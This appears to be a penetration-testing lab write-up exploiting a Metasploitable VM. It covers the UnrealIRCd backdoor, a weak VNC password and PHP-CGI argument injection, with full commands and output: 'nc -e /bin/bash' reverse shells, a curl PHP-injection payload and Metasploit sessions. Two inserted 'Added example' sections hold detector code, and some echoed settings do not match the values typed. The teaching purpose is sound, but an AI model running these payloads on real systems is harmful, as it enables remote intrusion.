Penetration Testing and Security

Metasploitable Vulnerability Scan Result Analysis and Exploitation

잉여토끼 2024. 10. 31. 12:18

Analysis of the results after running a vulnerability scan with Nessus

 

UnrealIRCd Backdoor Detection

1. Description

The remote IRC server is a version of UnrealIRCd with a backdoor that allows an attacker to execute arbitrary code on the affected host

The IRC server is running a version of UnrealIRCd that contains a backdoor. Through the backdoor, arbitrary code can be executed on the host.

 

  • IRC (Internet Relay Chat)
    A real-time Internet chat protocol.
    Supports chat and message delivery as well as file sharing.

2. Risk Information

CVSS v2.0

Base score: 10.0
Temporal score: 8.3
CVSS v2.0 vector: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  • AV
    (Attack Vector: Network): the attacker can reach the target remotely over the network.
  • AC
    (Attack Complexity: Low): the complexity of carrying out the attack is low, i.e. it is relatively easy to attack.
  • Au
    (Authentication: None): the attacker does not need to authenticate to reach the system.
  • C
    (Confidentiality Impact: Complete): the impact on confidentiality is complete, i.e. all information can be disclosed.
  • I
    (Integrity Impact: Complete): the impact on integrity is complete, i.e. data can be modified entirely.
  • A
    (Availability Impact: Complete): the impact on availability is complete, i.e. the system or service can become completely unavailable.
Temporal vector: CVSS2#E:F/RL:OF/RC:C
  • E
    (Exploitability: Functional): the vulnerability is practically exploitable.
  • RL
    (Remediation Level: Official Fix): an official fix has been provided.
  • RC
    (Report Confidence: Confirmed): the existence of the vulnerability has been confirmed.

 

CVE

CVE-2010-2075 (NVD - CVE-2010-2075, nvd.nist.gov)

 

3. Exploit

nc

1. Attempt an IRC connection on port 6667 (shell 1)

┌──(root㉿kaya)-[~]
└─# nc 172.16.20.14 6667
Trying 172.16.20.14...
Connected to 172.16.20.14.
Escape character is '^]'.
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
close
:irc.Metasploitable.LAN 451 close :You have not registered

 

It is possible to connect to the port and send IRC commands, but since the client is not a registered user, use of IRC commands is refused.

 

  • https://github.com/chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution/blob/main/script.py
    UnrealIRCd 3.2.8.1 backdoor command execution exploit in Python 3 (CVE-2010-2075). - chancej715/UnrealIRCd-3.2.8.1-Backdoor-Command-Execution
  • https://github.com/Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor/blob/master/exploit.py
    My backdoor script for a vulnerable version of UnrealIRCd - Ranger11Danger/UnrealIRCd-3.2.8.1-Backdoor

 

Confirmed that the backdoor for this vulnerability is triggered by AB;.

 

2. Put a port into listening state with nc (shell 2)

┌──(root㉿kaya)-[/smb/python]
└─# nc -lvp 9898
listening on [any] 9898 ...

 

3. Command injection (shell 1)

┌──(root㉿kaya)-[/smb/python]
└─# nc 172.16.20.14 6667
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB; nc -e /bin/bash 172.16.20.10 9898

 

4. Reverse shell obtained (shell 2)

┌──(root㉿kaya)-[/smb/python]
└─# nc -lvp 9898
listening on [any] 9898 ...
172.16.20.14: inverse host lookup failed: Unknown host
connect to [172.16.20.10] from (UNKNOWN) [172.16.20.14] 47031
echo "Hello"
Hello
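As an added example (not code from the post or from the exploit scripts it links), a small detector that walks raw client-to-server IRC data and reports lines starting with the AB; trigger identified above, telling them apart from ordinary IRC commands such as NICK or USER. The sample stream is constructed and reuses the line typed in shell 1; it assumes a sensor or proxy that sees the client stream line by line.

```python
"""Detect the UnrealIRCd backdoor trigger (CVE-2010-2075) in client-to-server IRC data.

Added example, not code from the original post. Per the session above, the backdoor
fires on a client line that begins with "AB;" followed by a shell command, sent on the
IRC port before registration. Assumption: the sensor sees the client stream line by line.
"""
import re

# Legitimate IRC client messages: optional ":prefix", then a command word of letters
# or a three-digit numeric, e.g. "NICK foo", "USER a b c :d", "PING :x".
IRC_COMMAND_RE = re.compile(r"^(?::\S+\s+)?([A-Za-z]+|\d{3})(?:\s|$)")

BACKDOOR_PREFIX = "AB;"


def classify_line(line: str) -> tuple[str, str]:
    """Return (kind, detail): ('backdoor', command), ('irc', COMMAND) or ('unknown', line)."""
    if line.startswith(BACKDOOR_PREFIX):
        # Everything after the prefix is what the backdoor hands to the system shell.
        return "backdoor", line[len(BACKDOOR_PREFIX):].strip()
    m = IRC_COMMAND_RE.match(line)
    if m:
        return "irc", m.group(1).upper()
    return "unknown", line


def find_backdoor_triggers(stream: bytes) -> list[dict]:
    """Scan raw client->server bytes; return one finding per backdoor trigger line."""
    findings = []
    # IRC lines end in CRLF; tolerate bare LF too (nc sends LF by default).
    for lineno, raw in enumerate(stream.replace(b"\r\n", b"\n").split(b"\n"), start=1):
        line = raw.decode("utf-8", errors="replace")
        if not line:
            continue
        kind, detail = classify_line(line)
        if kind == "backdoor":
            findings.append({"line": lineno, "command": detail})
    return findings


# Constructed sample stream: a normal registration, then the trigger line from shell 1 above.
SAMPLE_CLIENT_STREAM = (
    b"NICK analyst\r\n"
    b"USER analyst 0 * :analyst\r\n"
    b"AB; nc -e /bin/bash 172.16.20.10 9898\r\n"
)

if __name__ == "__main__":
    for f in find_backdoor_triggers(SAMPLE_CLIENT_STREAM):
        print(f"line {f['line']}: backdoor trigger, command={f['command']!r}")
```

A PRIVMSG whose text merely contains AB; is not reported, because the trigger only matters at the start of the client's line.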

 

 

Metasploit

1. Run msfconsole

┌──(root㉿kaya)-[~]
└─# msfconsole

 

2. Search for CVE-2010-2075

msf6 > search CVE-2010-2075

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/unix/irc/unreal_ircd_3281_backdoor  2010-06-12       excellent  No     UnrealIRCD 3.2.8.1 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/irc/unreal_ircd_3281_backdoor

 

3. Use the UnrealIRCd backdoor vulnerability module

msf6 > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) >

 

4. Check the module's payloads

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/adduser                    .                normal  No     Add user with useradd
   1   payload/cmd/unix/bind_perl                  .                normal  No     Unix Command Shell, Bind TCP (via Perl)
   2   payload/cmd/unix/bind_perl_ipv6             .                normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   3   payload/cmd/unix/bind_ruby                  .                normal  No     Unix Command Shell, Bind TCP (via Ruby)
   4   payload/cmd/unix/bind_ruby_ipv6             .                normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   5   payload/cmd/unix/generic                    .                normal  No     Unix Command, Generic Command Execution
   6   payload/cmd/unix/reverse                    .                normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   7   payload/cmd/unix/reverse_bash_telnet_ssl    .                normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   8   payload/cmd/unix/reverse_perl               .                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   9   payload/cmd/unix/reverse_perl_ssl           .                normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   10  payload/cmd/unix/reverse_ruby               .                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   11  payload/cmd/unix/reverse_ruby_ssl           .                normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   12  payload/cmd/unix/reverse_ssl_double_telnet  .                normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

 

5. Use the Double Reverse Shell to obtain a reverse TCP shell

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 6
payload => cmd/unix/reverse

 

6. Check the options for the attack

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options

Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CHOST                     no        The local client address
   CPORT                     no        The local client port
   Proxies                   no        A proxy chain of format type:host:port[
                                       ,type:host:port][...]
   RHOSTS                    yes       The target host(s), see https://docs.me
                                       tasploit.com/docs/using-metasploit/basi
                                       cs/using-metasploit.html
   RPORT    6667             yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be s
                                     pecified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target



View the full module info with the info, or info -d command.

 

 

7. Set the required options and any optional ones

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 172.16.20.14
rhosts => 172.16.20.10
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set lhost 172.16.20.10
lhost => 172.16.20.17

 

8. Exploit

msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run

[*] Started reverse TCP double handler on 172.16.20.10:4444
[*] 172.16.20.14:6667 - Connected to 172.16.20.14:6667...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
    :irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 172.16.20.14:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GaqunWR6j0zcMtRu;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "GaqunWR6j0zcMtRu\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (172.16.20.10:4444 -> 172.16.20.14:57968) at 2024-10-30 10:47:03 +0900

echo "HI"
HI

 

VNC Server 'password' Password

1. Description

The VNC server running on the remote host is secured with a weak password. Nessus was able to login using VNC authentication and a password of 'password'. A remote, unauthenticated attacker could exploit this to take control of the system.

 

The VNC server's password is set to 'password'.

 

2. Risk Information

CVSS v2.0

CVSS v2.0 base score: 10.0
CVSS v2.0 vector: CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C
  • AV
    (Attack Vector: Network): the attacker can reach the target remotely over the network.
  • AC
    (Attack Complexity: Low): the complexity of carrying out the attack is low, i.e. it is relatively easy to attack.
  • Au
    (Authentication: None): the attacker does not need to authenticate to reach the system.
  • C
    (Confidentiality Impact: Complete): the impact on confidentiality is complete, i.e. all information can be disclosed.
  • I
    (Integrity Impact: Complete): the impact on integrity is complete, i.e. data can be modified entirely.
  • A
    (Availability Impact: Complete): the impact on availability is complete, i.e. the system or service can become completely unavailable.

 

3. Exploit?

Connect using vncviewer

vncviewer 172.16.20.14::5900

 

Apache PHP-CGI Remote Code Execution

1. Description

The PHP installation on the remote web server contains a flaw that could allow a remote attacker to pass command-line arguments as part of a query string to the PHP-CGI program. This could be abused to execute arbitrary code, reveal PHP source code, cause a system crash, etc.

 

A vulnerability in which system commands are executed on the PHP-CGI program through an HTTP query.

 

2. Risk Information

CVE

  • CVE-2012-1823
    • sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
    • Vulnerable in versions before 5.3.12 and in 5.4.x before 5.4.2
    • When a query string containing %3D (a URL-encoded =) is present, PHP misinterprets certain command-line options while processing it, allowing a remote attacker to execute arbitrary code.
    • php_getopt is the function PHP uses to parse command-line arguments.
    • https://github.com/0xl0k1/CVE-2012-1823/tree/main
  • CVE-2012-2311
    • Exists because of an incomplete fix for CVE-2012-1823; has the same vulnerability as above.
    • Present in versions before 5.3.13 and in 5.4.x before 5.4.3
  • CVE-2012-2335
    • php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence.
    • Arbitrary code can be executed while the php-wrapper.fcgi script processes a +- string.
    • A wrapper is a script that mediates interaction between systems.
  • CVE-2012-2336
    • Exists because of an incomplete fix for CVE-2012-1823; has the same vulnerability as above.
    • Present in versions before 5.3.13 and in 5.4.x before 5.4.3

 

3. Output

POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host: 172.16.20.14
Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Content-Length: 115
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Pragma: no-cache
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*

<?php echo "Content-Type:text/html\r\n\r\n"; echo 'php_cgi_remote_code_execution-1729835760'; system('id'); die; ?>

 

Looking at the output above, options can be inspected or adjusted with -d through the URL parameters of /cgi-bin/php.

It is also possible to upload PHP code through the body data, and one can see that a command was passed to the system through the system function.

4. Exploit

Using curl

Attack by uploading PHP code using the allow_url_include and auto_prepend_file options.

These options can be checked in php.ini.

 

  • allow_url_include: when this option is set to 1, PHP scripts can include files via a URL. That is, files on a remote server can be included, which can be a security risk.
  • auto_prepend_file: this option specifies a file that PHP automatically includes before executing a script.
    If it is set to php://input, that path reads the body of the HTTP request, which can be a security weakness.

 

curl -s -X POST "http://172.16.20.14/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input" -d "<?php system('nc -e /bin/bash 172.16.20.10 9898'); die(); ?>" --connect-timeout 10

 

┌──(root㉿kaya)-[/smb/python]
└─# nc -lvp 9898
listening on [any] 9898 ...
172.16.20.14: inverse host lookup failed: Unknown host
connect to [172.16.20.10] from (UNKNOWN) [172.16.20.14] 36977
whoami
www-data

 

Through this process, a reverse shell with www-data privileges can be obtained.
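Added example, not from the post: a request-line analyser for web logs or a WAF that decodes a query string the way the CGI layer does, flags the CVE-2012-1823 condition (no literal = in the raw query, option tokens after decoding) and extracts the -d directives, then points out the allow_url_include / auto_prepend_file pair described above. The Nessus request from section 3 is shortened to its first -d directive and the trailing -n, the curl request is the one used above, and the benign target is constructed.

```python
"""Recognise CVE-2012-1823-style php-cgi argument injection in an HTTP request-target.

Added example, not part of the original post. The vulnerable php-cgi handed the
query string to its command-line parser whenever the RAW query contained no
literal '=', which is why the Nessus request encodes '=' as %3D and '-' as %2D.
"""
from urllib.parse import unquote_plus, urlsplit


def looks_like_cgi_arg_injection(target: str) -> dict:
    """Analyse a request-target (path plus query) from an HTTP request line.

    Returns {'flagged': bool, 'argv': decoded tokens, 'directives': {-d name: value}}.
    """
    query = urlsplit(target).query
    # A literal '=' means ordinary GET parameters; the bug only bites without one.
    if "=" in query or not query:
        return {"flagged": False, "argv": [], "directives": {}}
    # CGI decoding: '+' becomes a space, %XX escapes are decoded, then split on whitespace.
    argv = unquote_plus(query).split()
    directives = {}
    for i, tok in enumerate(argv):
        if tok == "-d" and i + 1 < len(argv):
            name, _, value = argv[i + 1].partition("=")
            directives[name] = value
        elif tok.startswith("-d") and len(tok) > 2:   # "-dname=value" form
            name, _, value = tok[2:].partition("=")
            directives[name] = value
    flagged = any(tok.startswith("-") for tok in argv)
    return {"flagged": flagged, "argv": argv, "directives": directives}


def risky_directives(directives: dict) -> list[str]:
    """Directives that together turn the request body into executed PHP code."""
    risky = []
    if directives.get("allow_url_include", "").lower() in ("1", "on"):
        risky.append("allow_url_include")
    if directives.get("auto_prepend_file", "").startswith("php://input"):
        risky.append("auto_prepend_file")
    return risky


# Request-targets: Nessus form shortened from the post, curl form from the post, benign one constructed.
NESSUS_TARGET = "/cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6E"
CURL_TARGET = "/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"
BENIGN_TARGET = "/index.php?page=1&lang=en"

if __name__ == "__main__":
    for t in (NESSUS_TARGET, CURL_TARGET, BENIGN_TARGET):
        r = looks_like_cgi_arg_injection(t)
        print("flagged" if r["flagged"] else "ok", r["directives"], risky_directives(r["directives"]))
```

A signature that only matches a literal "?-d" misses the Nessus form, so the check must run on the decoded tokens, not the raw bytes.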

 

 

Metasploit

1. Run msfconsole

 

2. Search for the CVE

msf6 auxiliary(scanner/ssl/ssl_version) > search CVE-2012-1823

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/php_cgi_arg_injection  2012-05-03       excellent  Yes    PHP CGI Argument Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/php_cgi_arg_injection

 

3. Select the module

msf6 auxiliary(scanner/ssl/ssl_version) > use CVE-2012-1823 0

Matching Modules
================

   #  Name                                      Disclosure Date  Rank       Check  Description
   -  ----                                      ---------------  ----       -----  -----------
   0  exploit/multi/http/php_cgi_arg_injection  2012-05-03       excellent  Yes    PHP CGI Argument Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/multi/http/php_cgi_arg_injection

[*] Using exploit/multi/http/php_cgi_arg_injection
[*] Using configured payload php/meterpreter_reverse_tcp

 

4. Check payloads

msf6 exploit(multi/http/php_cgi_arg_injection) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_aws_instance_connect  .                normal  No     Unix SSH Shell, Bind Instance Connect (via AWS API)
   1   payload/generic/custom                      .                normal  No     Custom Payload
   2   payload/generic/shell_bind_aws_ssm          .                normal  No     Command Shell, Bind SSM (via AWS API)
   3   payload/generic/shell_bind_tcp              .                normal  No     Generic Command Shell, Bind TCP Inline
   4   payload/generic/shell_reverse_tcp           .                normal  No     Generic Command Shell, Reverse TCP Inline
   5   payload/generic/ssh/interact                .                normal  No     Interact with Established SSH Connection
   6   payload/multi/meterpreter/reverse_http      .                normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   7   payload/multi/meterpreter/reverse_https     .                normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   8   payload/php/bind_perl                       .                normal  No     PHP Command Shell, Bind TCP (via Perl)
   9   payload/php/bind_perl_ipv6                  .                normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   10  payload/php/bind_php                        .                normal  No     PHP Command Shell, Bind TCP (via PHP)
   11  payload/php/bind_php_ipv6                   .                normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   12  payload/php/download_exec                   .                normal  No     PHP Executable Download and Execute
   13  payload/php/exec                            .                normal  No     PHP Execute Command
   14  payload/php/meterpreter/bind_tcp            .                normal  No     PHP Meterpreter, Bind TCP Stager
   15  payload/php/meterpreter/bind_tcp_ipv6       .                normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   16  payload/php/meterpreter/bind_tcp_ipv6_uuid  .                normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   17  payload/php/meterpreter/bind_tcp_uuid       .                normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   18  payload/php/meterpreter/reverse_tcp         .                normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   19  payload/php/meterpreter/reverse_tcp_uuid    .                normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   20  payload/php/meterpreter_reverse_tcp         .                normal  No     PHP Meterpreter, Reverse TCP Inline
   21  payload/php/reverse_perl                    .                normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   22  payload/php/reverse_php                     .                normal  No     PHP Command Shell, Reverse TCP (via PHP)

 

5. Set the payload

Since we want a reverse shell, use payload 22.

msf6 exploit(multi/http/php_cgi_arg_injection) > set payload 22
payload => php/reverse_php

 

6. Check the options and set the required ones

msf6 exploit(multi/http/php_cgi_arg_injection) > show options

Module options (exploit/multi/http/php_cgi_arg_injection):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   PLESK        false            yes       Exploit Plesk
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       172.16.20.14     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI                     no        The URI to request (must be a CGI-handled PHP script)
   URIENCODING  0                yes       Level of URI URIENCODING and padding (0 for minimum)
   VHOST                         no        HTTP server virtual host


Payload options (php/reverse_php):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.16.20.10     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

 

7. Exploit

msf6 exploit(multi/http/php_cgi_arg_injection) > run

[*] Started reverse TCP handler on 172.16.20.10:4444
[*] Command shell session 2 opened (172.16.20.10:4444 -> 172.16.20.14:59971) at 2024-10-31 10:26:53 +0900

whoami
www-data

 

Confirmed that a shell with www-data privileges was obtained.